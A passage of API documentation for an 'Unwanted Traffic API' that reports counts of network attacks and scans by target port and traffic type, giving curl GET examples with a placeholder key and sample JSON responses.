curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/target-ports/2723Example Response:
{
"status": "success",
"data": {
"dst_port": 2723,
"numberAttacks": "6850",
"numberScans": "0"
}
}GET /test
Tests if the API is running.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/testExample Response:
{
"status": "success",
"message": "Unwanted Traffic API is running"
}GET /traffic-types
Retrieves the breakdown of unwanted traffic types, with counts of scans and attacks. No pagination.
Query Parameters:
type: Filter by specific traffic type.Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/traffic-typesExample Response:
{
"status": "success",
"data": [
{
"numberAttacks": "2448863",
"numberScans": "0",
"traffic_type": "attack"
},
{
"numberAttacks": "0",
"numberScans": "613882",
"traffic_type": "scan"
}
]
}GET /traffic-types/{type}
Retrieves details for a specific type of unwanted traffic.
Example Request:
curl -H "X-API-Key: YOUR_API_KEY" -H "Accept: application/json" https://defrancisco.us/unwanted-traffic/traffic-types/scanExample Response:
{
"status": "success",
"data": {
"numberAttacks": "0",
"numberScans": "613882",
"traffic_type": "scan"
}
}